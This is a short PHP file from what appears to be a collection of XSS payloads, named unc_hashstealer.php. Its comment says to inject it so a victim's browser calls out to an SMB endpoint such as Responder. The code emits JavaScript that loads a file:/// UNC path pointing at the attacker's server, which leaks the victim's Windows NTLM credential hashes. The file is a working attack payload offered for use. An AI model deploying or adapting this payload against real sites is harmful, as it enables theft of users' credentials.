xss_payloads/unc_hashstealer.php

9 lines
223 B
PHP
Raw Normal View History

2016-08-02 15:53:04 +00:00
<?php
/**
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
*/
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
echo "// $url\n";
?>
new Image().src="<?php echo $url; ?>";